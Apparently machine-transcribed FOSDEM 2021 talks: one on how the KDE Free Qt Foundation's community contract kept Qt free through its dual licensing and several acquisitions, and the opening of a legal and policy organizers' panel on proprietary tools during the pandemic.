And the user interface which you typically had on these Linux distributions was FVWM. And this looked like this. So this is a window manager providing the different user interface elements, providing windows, providing panels, menus, all these things. Lots of fancy things like eyes watching the mouse pointer. Not a very uniform experience, not very easy to configure, not easy to use. So not something you would give to end users, or that end users would be really happy with. And this is where Matthias Ettrich started. He was a German computer science student back at that time. He was known for LyX, a user interface for LaTeX, which he developed, and he wanted to solve this problem of a user interface for end users. So he started with a call which was the birth of the KDE project, a Usenet post on October 14th in 1996. And he said, okay, I want to write a user interface for end users, which is supposed to run on Linux and other Unix-like systems. And I need programmers for that. So he asked for 20 to 30 people to come together to start this project, and people actually came together to join him in this endeavor. And in his original call, in his original announcement, he had already two firm decisions. The first of them was that the desktop, the project to be developed, should be distributed under the terms of the GPL. So it was supposed to be free software, available to the community, to the users, under the free software conditions, so that it would be free and available to everybody. The other decision he took was a technical one. And that was to use the Qt library as a base. Qt was a very new product back then. And he really liked this library because it was technically a very elegant way to solve this problem of creating user interfaces. He believed in the quality and the future of this library. So this was a strong decision where he said, okay, this is the way to go. This is the only technical way we can actually develop fast enough and create quality software which serves this purpose. So we have to use that. That's the best base. And this was made possible by something he also mentioned in the original announcement: that Trolltech, the company behind Qt, provided what he called free source code for free software. So they had a special edition which would be available for development of free software. To understand that, we have to go back another five years, to the year 1991. This is the year when Linux was created, when the GPLv2 was released; open source didn't exist as a term yet. And during this year, two Norwegian programmers, Haavard Nord and Eirik Chambe-Eng, sat on a park bench in Trondheim in Norway and discussed their job and what they were doing there. They had to deal with databases and user interfaces. And they saw a gap. They saw a niche to fill. And that was a usable GUI toolkit for cross-platform user interface development in C++. That was their choice for the foundation of this library, this toolkit. And they started to develop that. A couple of years later, they had their first public release. That was Qt 0.9. And you see a screenshot here on the right, some of the widgets in the example which came with the documentation and the library. So the widgets, which could be used to build a desktop or to build other graphical user interface applications in a quite convenient way. So they had a really nice API. They had the power of C++, which a lot of people believed to be the right choice for this, to do this in an object-oriented way. They solved a lot of problems with that.
And this release then was the start of the development of the story of Qt, which became the base of KDE as well. Resets of the technical qualities. One thing we have to look at is the model under which Qt was released. They decided on a dual licensing business model. That was innovative at that time. They were one of the first projects to do that, to release their library not only under a traditional proprietary license to which they sold commercially to their customers with support and availability for all the platforms they supported and everything. That's a classic thing to earn money to fund the development of their company. And in addition to that, and that was a new thing, they also provided a free edition, they called the Qt free edition, available for free software development on X11. So that was the platform then later KDE chose to use. And they created a license for that, the Qt free edition license, which had the conditions which would allow to use the Qt free edition for development of free software and only for development of free software. So if you would do proprietary software, then you would have to buy the commercial license. The Qt professional edition under the proprietary license, and you would get the right to develop your proprietary software with that. But for free edition Qt was available. And that's why Matthias took it and why it worked as a base for KDE. But it didn't come without complications because the Qt free edition license created quite some controversy. Because today you would look at the open source definition, you would compare the license with that, the open source definition didn't exist back at that time. So you couldn't certify it as an open source license or something like that. Today if you would apply the criteria of that to this old license, it wouldn't qualify as open source because it had some restrictions which are necessary if you want to really treat that as free software. So Qt itself wasn't completely free. It had some clauses like you couldn't do changes to Qt and distribute the changes and you had to notify TrialTek if you made commercial use of the free edition. So this is something where there were some restrictions. It didn't restrict the development of KDE as a free software project, but Qt itself wasn't free. And there was quite some debate about that and quite some pressure on KDE as well because of this decision from a technical point of view, it made a lot of sense from a licensing point of view, there were open questions. The other question was that what happens if TrialTek stops making Qt available for free software development? So if they cancel the license, if they go proprietary only or if the company goes out of business, there was a reliance on this company and especially as Qt itself was not free in the sense of free software. There was a problem that you couldn't just take it and develop it on your own. You would have to rely on the company to provide it. So this was a dependency which also was critically seen by a number of people. And the third concern there and that was also a concern of the time, Kalle Dahlheimer, one of the early developers of KDE, he points this out. He said, yeah, you have to understand that at that time people were afraid of companies buying other companies to shut down their products. And with Qt, there was a concern that Microsoft would buy it and shut it down because obviously there was some competition. Microsoft was also providing user interfaces libraries for that. 
So there was competition, and people were afraid that maybe, because you had this dependency on this one company, this could be used to shut the project down. And this fear wasn't completely unfounded. This is one advertisement Microsoft put in German computer magazines roughly at that time, where they instilled this fear of Linux not being a reliable operating system. So they say, okay, if you use this free stuff, you might get mutations. And this of course was a fear which they instilled to undermine this model. So there were concerns about how Microsoft acted at that time, which were not completely out of thin air. In 1997, there was a pivotal moment in KDE's history. This was the first developer meeting in Arnsberg, a small town in Germany. And at that time a lot of people were Linux enthusiasts and they put Linux into their internal IT infrastructure. And there was a company, a manufacturer of waffle makers actually, which is still around today. They had a Linux enthusiast who was maintaining systems there. And they invited the KDE developers to come together there. The KDE developers needed a place, and they provided them with X terminals and network infrastructure so they could work on KDE. And this was the place where the developers came together to polish KDE, to develop KDE, to write software there, to make it ready for the first stable release. But it also was the place where they were able to really discuss these questions about the licensing and about the threat which was there from the different directions, and come to a plan for how to deal with that. And it happened actually at a pretty delicate moment, because two weeks before the meeting, GNOME was founded. GNOME, as the competitor to KDE as a free software desktop, was founded partly because of this license controversy. So there was pressure there and there was the need to really decide something. And to this meeting, Eirik, one of the founders, and Arnt, one of the first developers at Trolltech, joined the KDE people at Arnsberg. They traveled to Germany and joined the group to discuss these questions. And one thing you have to note is that at that time Trolltech was six employees. So not a huge number, but six full-time people working on this toolkit, so providing a base. And KDE already was 200 developers. So the call for developers was quite successful. There was momentum. A lot of people rushed into this as developers, to help developing the desktop, developing applications. So in some way, this strategy worked for Trolltech. It worked because there were developers, free software developers, using their library. And for KDE, it also worked because there were people, and there was a model to actually fund this full-time development of the underlying toolkit. So there they had the discussions about this debate, what to do about it, how to enter the debate about the freedom of Qt, because the intention was to make it available for free software. And Trolltech came with a surprising offer. They offered to create a legally binding agreement between the community and the company, which would guarantee that Qt stays free forever. So this was something which came as a surprise. KDE didn't expect that. That's not what companies typically would do, give things away just for free. So there was a debate about that. And in the end, they decided, and they came to a conclusion and an agreement and said, okay, let's do this.
Let's create this agreement to add an additional guarantee for freedom, which is not covered by the license. So a statement of intent was signed. That's a short statement. You see the signatures of the two sides there, the Qt people and the KDE people. And this lays out the fundament of the KDE Free Qt Foundation, what it is and how it works. So the first thing is that the purpose of the foundation was defined: to keep the Qt Free Edition available for free software development. It was limited to the X Window System, so the system KDE relied on at that time. And the way this was supposed to work was that in case the Qt Free Edition would be stopped, would be discontinued, not developed any further, then the foundation shall have the right to release the Qt Free Edition under the BSD license. And with the BSD license, it would open it up to all software development, free or proprietary, and it would also allow to create another company with the same business model or something. So with the BSD license, there would be all the freedom you would need to, in the future, on one hand keep Qt free, but also develop it further and maintain it and maybe create a new ecosystem around that. So this was the basic idea. And they tried to explain that to the lawyers when they were formulating the agreement, the community contract they wanted to create here. So they hired a prestigious lawyer and tried to explain to him how this was supposed to work. And the lawyer had some trouble there. But finally, he was saying, so you are saying that you want to pay me to create a bulletproof setup so that you can never stop giving something away for free. And that's where Eirik said, yes, that's what we want. How does that work? So if we look at the construction in detail, we see the KDE Free Qt Foundation. That's the organization which was created for this purpose and only for this purpose. So a very clear scope. And the two parties, Trolltech on one hand, the company owning Qt, and KDE e.V., representing the KDE community, they were sending representatives to this foundation. KDE e.V. didn't exist when the community started to talk about the community contract. So this was one thing which happened back then, that the e.V. was founded. E.V. is the German abbreviation for a registered association. So that's a typical nonprofit organization in Germany, which is used by hundreds of thousands of associations actually. It's a typical legal nonprofit form. So KDE created that for the KDE Free Qt Foundation, but also, of course, to have an organization to back the community in terms of financial representation, legal representation and giving support. So that's what foundations typically do. I mean, nowadays we are very familiar with the concept. At that time it was something newer. It also took some while to get it right and create the bylaws in the right way and so on. But it was put in place in time to sustain the KDE Free Qt Foundation here. And the way the governance in the foundation works is that you have two representatives from each side, two from KDE, two from Trolltech, and they form the board of the foundation. And those are the only people who are there. They vote about things, they discuss things. And there's one special twist here. When votes are done about the agreement, then in case of a tie, the KDE side decides. So KDE in effect has the majority in this foundation.
So that means this agreement to protect Qt and to make it free is something the KDE, under the conditions which are put out in the contract, can trigger even against the will of the company owning Qt. And that's the specific leverage which was put into this foundation to make this guarantee effective. And the details of this mechanism are then in this agreement, the license agreement between Troitek and the KDE Free Qt Foundation, where all the details are formulated, how Troitek gives the license, the conditions when the license can be exercised to release it under the BST license, what has to be taken into account there, what is the process there, and so on. So the license agreement is then what actually has the details about this community contract, what it triggers and what it covers. So these are three elements, our what is there, which is the fundamental construction and setup of the foundation. And there are of course quite some details there. This is just to write it down, what I explained in the diagram. There are a few twists here, for example, the definition of what it means to discontinue Qt is defined in a way that if no major update of the Qt Free Edition is released for 12 months, then the foundation can trigger the agreement and can use it. So there are more of that, we will talk a little bit more about that a little bit later. So what are the consequences of the setup? This protects Qt, the library, the toolkit, which can you rely on for free software development against things which could happen to the owner of Qt. So bankruptcy is one case, the company goes out of business or takeover, another company acquires them and maybe does things in a different way or just a change of plans. Maybe the company would at some point decide to take the library proprietary or to not develop it any further. So for these cases, the agreement provides this protection with a BSD license or this option to release as the BSD license. And this would have these two effects on one hand that Qt could be used for any project for software as well as proprietary. So this would be a very liberal, permissive free version then, which obviously is not compatible with the business model of Trilitec at that time or in general this proprietary copy left business model. So this is really a protection against anything which could happen to the freedom of the project there, the availability of the project for free software development. And the other nice effect of that, which is also I think an important element is that this releasing the project under the BSD license also allows to build up a new company with a similar business model. So somebody else could continue in case the original owner is not able or not willing to continue that anymore. So you could build up a similar model. So you have some more stability guarantees to create a stable environment there, which also would provide at least the opportunity to fund development in a way which is necessary to put in the effort which is required. So after some months of discussion and formulation and negotiation, they finally signed the agreement KDE and Trilitec. They also wrote a press release where they announced the agreement and this contains a nice sentence which I think captures the vision of the agreement quite well. So it ends with we do this to prosper in a mutually supportive fashion. So what they realized there is that preserving the freedom of the library there and the availability for free software development that this is good for both sides. 
So to put this into a good direction, that was the underlying cause of the agreement and the ambition of the agreement to make this successful for the free software community, but also to the company which is working in this ecosystem. The agreement itself are only three pages. That's quite short. That's the first version. There also is the chart of the foundation which governs this construction about the membership and the voting and the majority and so on. So there's some additional text, but the actual contract about when the conditions are triggered and what happens then, this is in this agreement. Yeah, basically just one page of legal text. And it was just signed in time for KDE 1.0. KDE 1.0 was released July 1998. First version 1.0 based on Qt 1.2. So very early, some of the people who are around for a longer time might remember these versions, some nostalgic thoughts. This was the first stable release and it looked like this. Still not the most beautiful and most advanced desktop, but quite a step forward. So very consistent already and it had a lot of momentum. Lots of people were jumping on this, using it, developing with it. And this was the beginning of a series of quite successful releases. If we look at that at the evolution, KDE 2.0 was released in 2000. Two years later, version 3.0, of course, there were more versions of KDE over time. So this was the continuing development. Also Qt developed and Qt did some license changes. In 1999 with Qt 2.0, Tratec decided to go away from the Qt 3.0 edition license and use a new license. They also wrote that themselves, the QPL. And this license actually was an open source license. So at that time, the OSI was just founded, there was the open source definition and the QPL was accepted as an open source license. So a lot of these debate about the freedom of Qt itself went away at that point. And finally, they decided to do another step and to retire the QPL and move on to the GPL. And that, of course, was the time when we had the standard license. Lots of other people were also using. So this provided the point where Qt would consider it to be free by all the people around. Yeah, in 2005, Tratec did another step because we have talked about the platforms and the Xwindows System, X11. So Qt had this model where the Windows platform was only for commercial customers under the proprietary license. With Qt 4.0, they decided to put the GPL also on the Windows version for Qt. This allowed also for KDE to finally port applications to Windows, make their free software available on this platform as well. So this was a step which extended the scope of the license at this point. One thing which also happened there is that the agreement itself, the KDE FreeQ Qt Foundation agreement was involved. There was a second version of the agreement to adapt to these license changes, to also adapt to this technology, evolution, advancement. So there was another draft of the agreement discussed and negotiated to adapt to that. And one of the central questions of all these adaptations of the agreement was at that time and still is what actually is the Qt 3 edition? So what is a legally complete and binding version of what does it mean to be in the Qt 3 edition? What is contained there? Also what does it mean to release a major update? What does it mean to discontinue that? Would it be possible to move parts of Qt into another product, call it differently, and then release it under a different license? So how do you protect against that? 
How do you cover the different platforms which are covered by the agreement? So what about Windows? What about maybe future platforms? What about when the technology changes? And then of course also what licenses are acceptable. So not only the license of Qt itself evolved, but also the GPL, for example, evolved. There was version 3. So how is this reflected? Those are all the questions where the KDE Free Qt Foundation had to put in the work to find answers and formulate them in the agreement in a way which was balanced and still binding and serving its purpose. In 2008, KDE e.V. got an email, and this email came from the Trolltech founders, and they said: we sold Trolltech to Nokia. So this was the point in time when the agreement got tested, because that's what it was designed for. In case of an acquisition, you have a new situation, a new owner. What happens with that? Will the new owner keep up the freedom which is there? Will he keep up the support for the free software community? And how does the agreement hold there? Is it actually strong enough to survive such an acquisition? And we can now say it was strong enough. KDE e.V. was at the table from the beginning. There were negotiations between KDE e.V. and Nokia. So one of the first meetings, that was an interesting meeting, because Nokia managers came to Frankfurt in Germany, where KDE e.V. had its first office. We shared this with the Wikimedia e.V. in Germany there, with one shared employee. So at the very beginning, a small office, and then we had the Nokia managers coming there. I think it was the day when they published the quarterly earnings numbers and they were proud of how successful the company was. Of course, on a big, big scale at that time. KDE e.V., of course, was much smaller in terms of organization, but we had the strong community. And I think that was the reason also why this was interesting, because Nokia needed the KDE community and the Qt community and the wider community as leverage. That was one of the values they saw in Qt. And the agreement actually enforced that and made it really necessary to have these conversations. Yeah, with Qt 4.5, the LGPL was added. This increased the licensing options there, made it available for use cases which were not covered before. There was a third agreement reflecting these changes with licensing, but also with a new owner. So this again took a round of negotiations. And also a process was started to put Qt under open governance. Up to this point in time Qt was open source, was free software, so you could use it, you could change it, but there was no structured way to contribute to the upstream version. So this changed with the introduction of open governance. So a system was put in place where people could contribute, could also become maintainers of parts of Qt, who were not working for Trolltech or Nokia then. And this also caused an inflow of software from the KDE community, where people contributed the changes they had put on top of Qt, in a layer in KDE, back into the upstream version, to have a more streamlined and better maintained system. Over the next years, or the next decade almost, there was more evolution, more development. Nokia decided to sell Qt again. They put it, in two steps, into the Finnish company Digia. So they acquired the Qt business and the rights on Qt. Qt 5.0 was released, now under the open governance model. Digia also then formed a separate subcompany, The Qt Company, that's the owner of Qt today, to bundle the Qt business in one company.
And this company then in 2016 won public, this is where we are today. Qt 6.0 is the current version released in December. And during these changes again new owners, different legal situation. The agreement also was adapted and was evolved. The fourth agreement, the fifth agreement, continuous evolution there. And we'll talk about that in a second. There is an interesting plot twist. In 2013 Microsoft actually bought Nokia. So at that time Qt already was in the hands of Digia but the fear from the 90s that Microsoft might acquire Qt to do whatever evil things they meant to do to that. This fear almost become reality here but Qt already was not part of Nokia anymore at that time. So nothing happened in this area. Where are we today? What are the lessons we learned? First of all we can say the community contract worked. The mission was accomplished. If we look at the KDE Free Qt Foundation it's around for more than 20 years. It's alive. There are people there working on it. It's not a huge amount of work. It's not a constant activity but it's something which always is when changes occur then these get addressed. And the purpose has been accomplished. Qt stayed free through also sometimes turbulent times. So the different acquisitions. There was a lot of politics and a lot of dynamics there which might have caused trouble but the goal of the foundation to keep Qt free that actually worked. And both KDE and Qt had a lot of success as projects and also impact. So we can say that the original goal was accomplished. And if we look at how that worked I think it's kind of key here to look at the two sides of licenses and this community contract. So if we look at the license that's what guarantees us the present freedom. So if I have the code under the free software license I can use it. I can develop it. I have the freedoms which are guaranteed by the license. So this only is valid for the code I already have. For the future of course I can develop it myself but I have to trust or rely on the people owning the full rights on the code to do what they promise to do. And the community contract adds this additional layer of protecting the future freedom as well. So this is this forward looking thing where you say okay in the future if you stop releasing it then something happens which makes it free. So I have this guarantee for the future. And this is I think a good combination because in addition to that it also adds this need for continuous conversation. So the community has to be in contact with the company and there is this balancing out of interest that happens on an ongoing base. And for this the community contract provides leverage which otherwise just with the license wouldn't be there. There are a few questions which are sometimes asked in the context of the KD3Qt Foundation and one of these is what about a fork? So it's Qt as GPL so we could just fork it right? And that's true. The GPL allows forking obviously. You can develop a new Qt version under the GPL and do your own fork independent of the company or anybody else working on it. Of course there are some drawbacks. The first is obviously it would split the community so if you create a fork then you have in total less people working on each version. So this might be a problem. In addition to that also forking wouldn't allow this model of proprietary dual licensing business model to work. With a fork you can do the GPL version. I mean you can sell products based on top of that but you can't do this proprietary dual licensing thing. 
Which if this is the way how the development is funded might be a problem if that's not possible anymore. There might not be a sustainable way to fund the fork. And the third thing is that and this is a clause which was added in 2004. The agreement can be terminated if KDE stops using Qt. So this is part of the ongoing balancing between the interests of the community and the company that it was added there to make sure if the KDE community stops using Qt then actually there's no reason anymore there to provide this community contract. The original reason is gone. So in this case TrialTek or the owner, Nokia, Digia, the owner of Qt can terminate the agreement and say yeah you're not using it anymore so you're not bound to these conditions anymore we go in different directions. In this way also KDE becomes kind of the steward of this part of the freedom of Qt for the rest of the free software community so that's something which I think is important and the people in there are aware of to use that in a responsible way. The other question which is often asked is is the KDE Free Qt Foundation a good model for other projects? This dual licensing situation with the proprietary license and free software license or specifically a copy left license is used by the projects or could they also add this additional layer of freedom by adding such a community contract? And I think you have to look at this situation here. I think there are situations where this actually could be an exemplary setup. So if you look at these single vendor projects where vendor holds all the rights to be able to do this model of proprietary license and a copy left license this requires a CLA from contributors so that the vendor has the rights to do the dual licensing and this adds some asymmetry because in this setup the contributors which are contributing to the project they and the community in general they have less rights than the company because they have the rights under the open source license and the free software license that's what all of them have but the company in addition has this additional right to use the proprietary license to fund their business. And this is an asymmetry which can be demotivating or a reason to maybe distrust the company or you have to trust it you have no further leverage. And there the agreement a community contract in the style of the KDE-freeQt Foundation can add some balance there. So you put on the other side the agreement which gives the community additional rights that's this majority situation in the KDE-freeQt Foundation where the agreement can be triggered against the will of the company if the conditions are met. And there you have this shared pledge for the future that the freedom is there which also gives people more guarantees for contributors more safety that they can actually be sure that the software is available under the conditions they are trusting in and you have this legal box to balance out the imbalance of the CLA. So that's where something like that could work. One thing you have to be aware of is that this requires some maintenance. This is the contract how it looks today and the latest version of the agreement the license agreement. It's not three pages anymore. It's some more pages. And the questions we discussed before about what is in Qt, what licenses are covered, what platforms are covered and so on. So this was formulated in more detail and fleshed out and adapted to the current situation and more components came into that. 
So obviously with the development over many years many factors change and some of these have to be reflected in the agreement. That's what happened there. On the other hand you also have to look at that. That's more than 20 years of development adding 10 pages to a contract in 20 years is something which actually can be a reasonable effort. And to just visualize the development a little bit better here. So this is the scope of the licenses and the agreement over time over the 25 years of history here. License wise we went from the Qt 3 edition over the QPL and the GPL then now to the combination of GPL and LGPL. The community contract at the beginning only covered X11. Windows was also around but not covered by the agreement. So the KDE ports to Windows at the point where Qt was available under the GPL were possible but this additional safety that the Windows version would still be there for the time being and for the future. There was no additional guarantee there. So this was only added quite a bit later where the community contract was expanded to also cover the Qt version on the Windows platform. There are two more things I would like to mention in this diagram. So one is Wayland. This is in this dotted lines box here because it's kind of covered by the agreement. The agreement says and that also was something which was added later over time that not only X11 is covered by also any successor of the system. What a successor is is something which is determined by the board of the KDE Freq foundation. In this case actually the simple majority where KDE decides is not sufficient. So this is not completely cleared yet if Wayland covers falls under this condition or not. So this is something where eventually maybe another change in the agreement is necessary. And the other thing is Android. Android is actually the support for Android. So the mobile platforms, the desktop platforms were covered from the beginning. Also MacOS which then always was under the community contract. The mobile platforms were only added later. Android actually was there from the beginning because this emerged from the KDE community. So the KDE community developed the support for Android and then later contributed it to the Qt project. And this happened under the condition that the community contract would be extended to also cover Android. So that shows again this example where the ongoing conversation there helped to shape the conditions in a balanced way. Good for the community, but also of course good for the company because Android was added. Later this also was extended to iOS, that's where we are today. There are a few other platforms which are there, but these are the most relevant from the KDE and Free Software Point of View. The last thing which I think you have to consider if you are looking at this kind of community contract, this kind of agreement is that it takes courage to do that because it has this future perspective where you are the thing Eric had trouble explaining to his lawyer that he wants to make sure that he can't stop giving something away for free. That's of course a bet in the future, a bet on the power of the Free Software community and the power of the model also on the quality of the product and the development and the people around that. So it takes courage. It was about move, but it did work because people put in the effort to make it work. 
Yeah, so the KDE Free Qt Foundation: we talked a lot about legal rights, about licenses, about contracts, about community, about the details of how this developed and how this works and what are the pitfalls there, what are the advantages. But I think the fundamental thing here to look at is actually freedom. This is the core of the KDE Free Qt Foundation, because freedom is good for business and it's good for the community and in general it's good for the world. And the statement from the original announcement of the KDE Free Qt Foundation, I think, captures it beautifully, because it says: we want to prosper in a mutually supportive fashion. And that's what is enabled by going a way which is based on freedom. So thank you for watching this presentation. We are at the end of the story. I'm happy to talk more about that. So if you want to discuss it, please feel free to reach out to me, and I wish you much fun with more presentations of FOSDEM 2021, and stay safe.
|
When the initial release of Qt was published in 1995, it was one of the first projects to use a dual-licensing model. This model, LGPL and a proprietary commercial license today, has served the project well for more than 25 years. It is less well known that the dual-licensing model is supported by a community contract which guarantees the freedom of Qt beyond what is covered by the license. This contract is maintained by the KDE Free Qt Foundation and has kept Qt free through multiple acquisitions and other turbulences. This presentation will explain the community contract, how it augments the dual-licensing model, and how it has evolved and served its purpose for 25 years and counting. It will also discuss the lessons learned and how it can serve as a model for projects today. The KDE Free Qt Foundation was born from a heated dispute about open source licenses in the late nineties. It resulted in a unique mechanism to ensure software freedom for the Qt and KDE ecosystems through a contract between the community and the company owning the project. It has stood the test of time and got the community a seat at the negotiation table going through multiple acquisitions. The contract between the KDE Free Qt Foundation and what is today The Qt Company gives the community a say in any license changes to Qt. It guarantees that there is the base for a sustainable model to provide Qt under an open source license and a corresponding open source based business model. With this it goes beyond what licenses cover. It is the counterpart to CLAs, as it is constructed asymmetrically in favor of the community. That it has preserved the freedom of Qt through multiple acquisitions, among them Nokia buying and selling the technology, is a testament to the effectiveness of this setup. The presentation is based on a series of conversations with the people involved and first-hand experience from serving as a representative of the KDE Free Qt Foundation.
|
10.5446/56839 (DOI)
|
Hi, and welcome to the organizers panel of the legal and policy dev room at FOSDEM. You stuck with us this long. This is the end of our second afternoon of material and we organizers wanted to come here talk about a few relevant topics of the day and say hello to you and tell you who we are. So shall we introduce ourselves, everybody? Some of us have already been on moderating panels, but my name is Karen Sandler. I'm the executive director of the software freedom conservancy. I care about software freedom because I'm a cyborg lawyer and I have a pacemaker defibrillator implanted and I would love to see the service code in my own body. So Alex. Okay, I'm Alexander Sander. I'm a policy consultant and yeah, therefore, I'm trying to make sure that everybody in the European Union knows about free software and the advantages of free software and especially decision makers and yeah, so that's my job. And I hand over to Bradley. So I'm Bradley Kuhn from software freedom conservancy. I'm the policy fellow there. I've been helping organize this panel for a while and excited to work with our new team that those of you who have seen our panel in person at FOSDEM in the past see that we're a little different group here. So Richard. Oh, Max. I just continue. All right. So my name is Max Miel. I work for the Free Software Foundation Europe. I work there in different areas, started with policy and meanwhile also more in the legal area where I coordinate a few initiatives like reuse for instance, which we will definitely talk about later. And yeah, I stuck with the FSB for a long time and yeah, I care about free software too as many of the most or all people here in this panel. I'm Richard Fontana. I'm a lawyer at Red Hat. My work involves mostly open source and free software related legal matters and I've been doing that for a long time. And I've been involved in some way in helping organize this step room, excuse me, since pretty much the beginning. So happy to be here again. Yes. And now is a really good opportunity to say thanks to my fellow CORE organizers who have done this all of these years with me and thanks to our new organizers for participating with us. It's been a really, really challenging and also fun year as it turned out thanks to all of your participation. I want to take a moment to thank Tom Marble who had been a co-organizer for previous DevRAMS who always worked so, so hard. We keenly missed his absence this year and I hope he's watching along and know that we really appreciate all of his past work and have thought about what he would say at every step of the process. I'm sure he's watching right now and will be saying something in IRC for those of you following along in the chat. So I think that leads us perfectly to the first topic to talk about. Normally on this panel we talk about what we see are themes that come up in our DevRAMS or really important issues of the day. And I think one of the things that is the most poignant is simply events in the age of COVID and how operating during the pandemic is an opportunity for software freedom but also a challenge as proprietary solutions are foisted upon us. Yeah, I've been watching this really carefully this year and I'm very concerned that the video chat quickly became a center of how people got their work done and at least here in the United States and I'm curious to hear from my European colleagues that's happened there. 
It's so dominated by a single proprietary software company, namely Zoom, that people in the United States use Zoom as a verb to mean video chat now. They talk about doing a Zoom, talking on Zoom, being on Zoom. And it's very frustrating to even tell people that there's an alternative that's available. We're using Big Blue Button to record this panel. Jitsi is being used by Fosdom to do the live chat during the conference. And they are excellent free software technologies that we just have had great challenges, at least we've seen here in the US, getting others to pay attention to. Are you all seeing the same thing in Europe, has it been difficult to get people to switch off proprietary video chat platforms? I would say definitely, yeah. We had those issues as well, especially in the beginning of the pandemic. But I have to say that we also saw a lot of positive examples here. Like for instance in the educational sector, Big Blue Button is a known thing. I know a few students right now, younger and older, and most of them are aware of using Big Blue Button when I invited them for an association's meeting. So at least that's some good news. And we have a lot of activists who spread the word about those alternatives, not only regarding video chat, but also other collaboration tools that we see. So there's also a pride side of things. Also maybe to add here, what we've seen in the very beginning of the crisis is that many companies use the term free software in order to promote their software, which isn't free software. And it's more likely a shareware, a freeware or whatever. And they had subscription for three months or stuff like this. And they really tried to get on the market with using the term free software. And this is also what we've seen in the beginning and what we tried to challenge with some news articles and press release on that. But yeah, this is also something we should keep in mind for future that the term free software is not connected to these kinds of offers. Yeah, indeed. And since the early 2000s, I've encouraged people to just at least in speaking in English to say software freedom instead, because it's less ambiguous. Do you have software freedom is the question to ask people. And it's not just happening, I think with video chat during the pandemic. There's just this whole group of proprietary technologies, many of which replace technologies that were invented in free software. So if you look at things like Slack and other proprietary technologies, we've had free software chat clients since the beginning of the internet in the early 1990s. And now these companies have found a way to sort of insinuate proprietary technologies that replace standing free software applications in the marketplace. And so it was so bad that I recently participated in an online conference where every technology for the speakers was a proprietary technology. The speaker's guide was in Google Docs and the back. It wasn't on Slack, but it was on Discord was the speaker chat and the video platform for recording talks was proprietary and the online collaborate, the venue platform for the day of was a semi free software license under a non-commercial use only style license. So even free software conferences are having a challenge. 
It's kind of, it's very impressive that FOSDEM — while it's been certainly very difficult to organize a dev room remotely this year — one of the things that one of the organizers of FOSDEM told me last week was that their goal was to prove to the world that you could run a conference as large as FOSDEM as an online event during COVID using only free software. And as we've seen these last two days, they have succeeded and we've pulled this off. So it's really impressive. And while, well, I've had my frustrations of trying to organize this event remotely — it has not been fun, and I wished Tom Marble was back many times, and he's been laughing at me every time I talk to him, appropriately so, because he did all the work in the previous years — I'm really glad that this has happened so that we can show that these events can be done with all free software. Yeah, I was going to say that I don't actually feel like this year, this past year, has been really significantly different. And I think that's one of the points you're making, Bradley. I've watched the proliferation of non-free, non-open-source tools even in sort of technical or developer communities that are oriented towards free software development for almost as long as I've been involved in kind of doing legal work in this area, at least, maybe not going back further than that. So maybe things have accelerated somewhat, but I see it more as a continuation of a pattern. I think that's true. And I think that what we saw was a highlighting and exacerbation of that trend. And seeing that happen in the health space — and we had a whole panel that mostly talked about this issue. You know, I think that the idea of focusing on software freedom has never been more important, because so many of these non-free sharing solutions are being promulgated and people think that they're helpful in an immediate emergency, like the Medtronic ventilator that, you know, is allowed for use but doesn't grant the rights going forward. We're planning for this pandemic and our emergency needs, but we're not planning for the next pandemic. Yeah, I think, Fontana, you're absolutely correct that this has been an ongoing problem that's been exacerbated, especially in the developer communities. When I think about it, just to compare it to some of the other panels we had: in the compliance panel, we didn't talk too much about the compliance tools thing. And the main reason, as a moderator, I didn't push on that issue so much is because I know many of, most of the tools that people use, software tools, are non-free. FOSSology was mentioned on the panel, which is the only FOSS tool for compliance, more or less. There are a few others, but it's certainly the most popular one. All the other tools that are very popular are proprietary. And even the collaboration communities that develop those standards and tools, they're using proprietary software — in a major compliance tools project, you have to agree to a proprietary license and agree not to reverse engineer the mailing list software just to join the mailing list of that project. So we're really seeing more and more that people doing FOSS aren't using FOSS tools. And I can't help but mention GitHub, which is the most popular FOSS development site, is a proprietary software site with tons of proprietary JavaScript that people are using to develop FOSS every day. So I think that's something that the pandemic has just made more obvious, but you're absolutely right, Fontana.
It was there for some time now. Yeah, it's sad because we actually have the tools, like we have the alternate tools that work like Big Blue Bun. And if we were all to put our weight behind them, they would improve. And it would be this amazing thing, but instead, because we're instead as a society doubling down on these proprietary solutions, and we free software contributors are the ones who are locking that in. So what do folks think? So what are some other themes that you think have come up over the last year that we ought to address? Is there anything else that was major that happened this year that we should be sure to talk about? I mean, in terms of health, what I found kind of really interesting was the discussions about the tracing apps. So there's also somehow a light at the end of the tunnel and this discussion around these tracing apps and interoperability and that we can share data across borders, especially in Europe. That's an issue. And so this helped a lot, especially on the decision maker side. So they now have a better understanding of why open source free software is so important and why, especially if it comes to sharing across borders and across languages, it's so important that we have this tracing app in Spain, in Germany, and I don't know in Austria in a different language, but they are able to talk to each other. And this is only possible because it is free software. And we had a huge debate here in Europe around these tracing apps and especially around that it is free software. And so this might help at the end and also in the health panel, we've seen that there had been loads of hackathons, for example, that the results have been published as free software because it is a good idea to do so. And I think this panel was also very interesting in this regard. If you speak about health apps and the corona tracing apps, it's still quite interesting that the platform for all of this, while we have two gatekeepers here with Google and Apple, and it took the free software community quite a few of months to make this possible, like to have these exposure notifications API all implemented with free software. And so people can just install it from, for instance, after for Android phones. So we're again in the situation where the software itself is free, but the platform is not. It's quite interesting also for publicly funded software to see basically can I really use it with as much software freedom as possible? And it turns out it's still quite interesting a long way to go. Yeah, certainly when you compare it to the United States, all the new stories were about Google and Apple, we're going to solve the contact tracing problem and all of the apps that are proprietary that people are using here, so I'm so glad to hear that in Europe. As we heard about in the, when I was listening to the, the DMA talk, I mean, the DMA talk was sort of saying, well, we need to make this law so much better in Europe. And I was looking at his slides of stuff that's already in your laws in Europe. And I'm like, I wish we had that much like what you already have in Europe, I wish we had here in the US because there are no laws that are very friendly to interoperability and free software the way that you already have in Europe. So, so kudos to you all who've done policy work in Europe to make that happen over the last 20 years because we, we, we unfortunately do not have a system where it's easy for us to get that stuff into our legislation here in the United States. 
